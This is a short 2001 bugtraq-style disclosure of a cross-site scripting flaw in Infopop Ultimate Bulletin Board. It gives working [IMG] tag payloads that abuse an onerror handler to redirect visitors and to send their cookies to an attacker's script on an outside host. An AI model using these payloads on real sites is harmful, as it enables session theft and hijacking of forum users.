Здравствуйте, уважаемый(ая) bugtraq, Posting something like this UBB tag: [IMG]http://about:test"onerror="top.location.href='http://punk.tomsk.ru';[/IMG] to Infopop Ultimate Bulletin Board, we are able to redirect users browser to http://punk.tomsk.ru There are many ways to stole cookies using this vulnerabliety, one of them: [IMG]http://about:test"onerror="this.src='http://somedomain.com/yourscript.php';[/IMG] and yourscript.php - is a script to recieve users cookies 8) -- // Э.Заитов AKA kyprizel mailto:kyprizelat_private ICQ#3337333 -- "Knowlege itself is power..." F.Bacon --
This archive was generated by hypermail 2b30 : Thu Nov 15 2001 - 13:57:06 PST